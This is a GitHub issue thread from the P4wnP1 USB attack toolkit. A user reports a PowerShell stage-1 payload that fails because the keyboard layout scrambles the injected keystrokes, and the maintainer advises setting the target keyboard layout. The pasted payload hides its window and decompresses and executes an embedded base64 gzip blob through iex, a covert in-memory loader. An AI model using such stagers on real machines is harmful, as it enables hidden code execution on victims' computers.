RoganDawes/P4wnP1 #30: Payload for Powershell dosnt work

Floppynator, 2017-07-31:
sorry, markdown destroy the output :(

Any Ideas?

`> $h´)GetßProcess ßId $pid=.MainWindowHandleö$ios´üRuntime.InteropServices.HandleRef+ö$hw´NewßObjec
t $ios )1,$h=ö$i´NewßObject $ios )2,0=ö))üreflection.assemblz+ÖÖLoadWithPartialName)ÄWindowsBaseÄ==.GetTzpe)ÄMS.Win32.Un
safeNativeMethodsÄ==ÖÖSetWindowPos)$hw,$i,ß100,ß100,80,80,16512=
In Zeile:1 Zeichen:3
+ $h´)GetßProcess ßId $pid=.MainWindowHandleö$ios´üRuntime.InteropServi ...
+   ~
Unerwartetes Token "´" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:4
+ $h´)GetßProcess ßId $pid=.MainWindowHandleö$ios´üRuntime.InteropServi ...
+    ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:105
+ ... ios´üRuntime.InteropServices.HandleRef+ö$hw´NewßObject $ios )1,$h=ö$i ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:131
+ ... es.HandleRef+ö$hw´NewßObject $ios )1,$h=ö$i´NewßObject $ios )2,0=ö))ü ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:137
+ ... dleRef+ö$hw´NewßObject $ios )1,$h=ö$i´NewßObject $ios )2,0=ö))üreflec ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:138
+ ... leRef+ö$hw´NewßObject $ios )1,$h=ö$i´NewßObject $ios )2,0=ö))üreflect ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:181
+ ... ject $ios )2,0=ö))üreflection.assemblz+ÖÖLoadWithPartialName)ÄWindows ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:205
+ ... ction.assemblz+ÖÖLoadWithPartialName)ÄWindowsBaseÄ==.GetTzpe)ÄMS.Win3 ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:252
+ ... seÄ==.GetTzpe)ÄMS.Win32.UnsafeNativeMethodsÄ==ÖÖSetWindowPos)$hw,$i,ß ...
+                                                                 ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:1 Zeichen:260
+ ... etTzpe)ÄMS.Win32.UnsafeNativeMethodsÄ==ÖÖSetWindowPos)$hw,$i,ß100,ß10 ...
+                                                                  ~
Ausdruck nach "," fehlt.
Es wurden nicht alle Analysefehler berichtet. Korrigieren Sie die berichteten Fehler, und versuchen Sie es erneut.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken

> $USB?VID´ä1D6Bäö$USB?PID´ä0437äö$b´äH4sIAAAAAAACA6VZbVfiRhT`nl8xJ5vWcIQcwJf12ONpEdDlFJEV7LYFDmcIE
0k3mbCTiYYa-3vvnckLZcVuqx80YO7Lc5-7NmL4HrFrPJLEuh2dy37pdSrkKXs8Mxud43Py2SgLDQuhIQrVDw-eg5CXcFf6ESc3yAuZK9uCUcku-IBdMbmMF
nbFeDKsRRSSMyJprVadKKQ`n56ethMhGJf6M0hQEBiwx9r1-A8wk5kDz04rjlk4D9ZDGjLbvKJX7KTYWfPstVkxLDoHbfTidJjncwbHNPTdTMQG81Uz2bDYD
X2YGy5P-GDBRMt1WRwDtJuEg81Q2aTyssmraJEEmyD0C7NKrAsaxAwUpVIMM8XxepXLg5g5TOaB71YJO6BxjOBdD8kBtVQhJc4sqDTL4LVAS0rhyxPJ4mlhd
CSp9F2U73E5lGIKTwhgMp2Sn`yJCFT4-VQfHyTx4TY-KjRud5`SCiJe`JhO4En6IXPgiIloNWLiwQcKnU4Q9MJVJGQOcepcMtmOeCxF4spI2AUWYc`jzl4R4
oXPgkWPe1EK-D`6Uuq22eVSrIeRy6VYqYL-aWQoWAzSbOTfoxXjf5oYMdmnsewKEZk3oGnTIADagMsH6B6g6i2Z2ksqAJepcÀ9qCyoBtS8l2vQGouE5X92`v
wKIrTUJ5-TlfàkoZCoq1ERgqPu3skqPYtJ7GMwjzwtIttrM4qZv-MBGfBQdNYBAGzhGWmfkOguu0c8LhlxVaOVRc7OnjVvxVjZ9QVpEANMxpeiCjsMIxjSOX
StsLQDSDUtMCJtZK3agwu1WCAUxh-uQ1bnectWf`1Xdc-ÒraQYFiMjG6`CR8zZqGPD39HZgsYGEeMXh5vWK86N-6n4cbRjcVcXgiKgRwHkUBo3xaB3LOJle`
K6I48qQDzQMWR9RjHzhfBJAtfEYn`vN2d8d2YVKfpuG6kOqH6DOEiax69Gx3UADlDIFZmKeUjuPDDWANBSyV19z-5LtxODUEk4ngW`43cghamzlLd1`12HWZ
rw`9ymXiL87Mp8NFgx0dyYs1r3Hs1RoN16udnLjyWr3egB8k9qD`bBpeBJjcJbGtx9BfsAfic3IPj0RROAPbAFWKKAiZ0O7J3989TUBialsymP`QtQU0TeWY
wLJVGyi15GjxXofUQirRhYmBNsk`2fseMM-24MnMIjArpAbpITsN7EF4e6mQ3vOpYNqUiMCCy1iekEny7u7HO-SViQ0Hw8zmc8NWAXWYvXe3V917B1ZBzDsl
nHII3D-n1oySveFLwmIJiùeNSFckPehcvFvlEiFwZ04h8afCfalPBHO1xI2G7GPj6C0ZEzvoA7ZKzIbhibNqarO8pvaPBKk0TwxJlhSUHQ4urA0`7CXZZZjz
MZpblkhobdJqo5xxGvuLkXE-bòGlGOWThkC-Tl4f3AeFxC7WZXq-w8KycI2VEO7U1oVQJ9ixG8DqutNZjQlJKZ4eIDFALdK2IdbDZ75zo3bI26H1EoO9BkZG
UcHxhW`3ow6LbHs-Pe`GUhpEwV64ZkhrQDL5WaRqAMqJERQe88CedMkCfoI1LyCCL65pSh8LfwN4f2-KxL8c2ktNo-46Hz3B7f9GftDz0Ivo879NzXav0JWH
IQOwwbrMPZniS`mmqkXkmVrkaXs9G4ddltym66H2`7o-E36Tcqiu-JaB1LFjpb8r2470sYsC5f`JRDD02oEHStYi0IxcDODucVAtSs6DqIqKrYUmD7YJeaZf
W7A5RPVY0`4-fQ59YFb5BWDYaIFasuyòTA1XtObWBcVvY0OlM1XBpA804TXJQ`8TeaO951t5NUiNoAK8z5Too`Sxzq18jYp4EAeR6fNNtXc3Gvw27RXCj4fV
g1EWgOfEw6rMetmDnMNW5bz6mlL78sLFxqBpLcXMvsXDSvYAGUIOhqELQQJZUqj4o2TpwnGPZxpg1jK509t5xGrCqVS39WxGRr6sodVf54ZWyyJ8qqQLXtpt
xpO8oubGqao4NtLs1MiGtsoxi6dy2nO3JSHA0Qt0SECd4mztmTI5RMYBDUKRObnXK6`mKLNxpyl8pmIrKRVFhRVobjmM391WhTtUcZrgTCuH9rcQVwuXwbBP
3z-Nmg71QPPlZyqT0hSCrHM7SzoHcqslI1GQs2vPrPXp8VB58qWw6muFku-u2``45u5lNdOtOMyjoGa-GZGfHVwmGuiifla9u`TcZ`c1N3TLAzuu3dH0P13f
yjVSVbzPKEv4zskH7wtcSUJF9GEx2FlBqDJb18PCRDxsO-MvDVeGKhNtorapsVgyjHwaPTpiIEQAAäönal no NewßObject ßFöiex )no IO.StreamRea
der)no IO.Compression.GYipStream))no IO.MemorzStream ßA "),üConvert+ÖÖFromBase64String)$b===,üIO.Compression.Compression
Mode+ÖÖDecompress===.ReadToEnd)=öexit
`

mame82, 2017-07-31:
You should use `SetKeyboardLanguage` and set the keyboard layout to fit your target, before running `FireStage1`

Floppynator, 2017-08-01:
Hmm sounds logic :) I will try this later that day and report.

Floppynator, 2017-08-01:
Oh works great! Thanks for the quick response!

mame82, 2017-08-01:
No problem

closed 2017-08-01 by mame82